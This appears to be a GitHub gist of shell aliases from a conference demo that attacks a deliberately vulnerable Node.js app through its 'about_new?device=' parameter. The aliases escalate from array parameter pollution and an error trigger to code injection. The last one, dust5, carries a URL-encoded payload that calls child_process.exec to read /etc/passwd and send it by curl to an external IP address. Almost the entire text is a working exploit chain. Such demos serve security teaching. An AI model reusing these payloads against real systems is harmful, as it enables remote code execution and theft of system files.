You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
alias dust1="curl $GOOF_HOST'/about_new?device=Desktop'"
# Request with array
alias dust2="curl $GOOF_HOST'/about_new?device\[\]=Desktop'"
# Trigger error
alias dust3="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27'"
# Simple RCE, logs to console
alias dust4="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-console.log(%27FrontendConf%20Was%20Here%27)-%27'"
alias dust5="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-require(%27child_process%27).exec(%27curl%20-m%203%20-F%20%22x%3D%60cat%20%2Fetc%2Fpasswd%60%22%20http%3A%2F%2F34.205.135.170%2F%27)-%27'"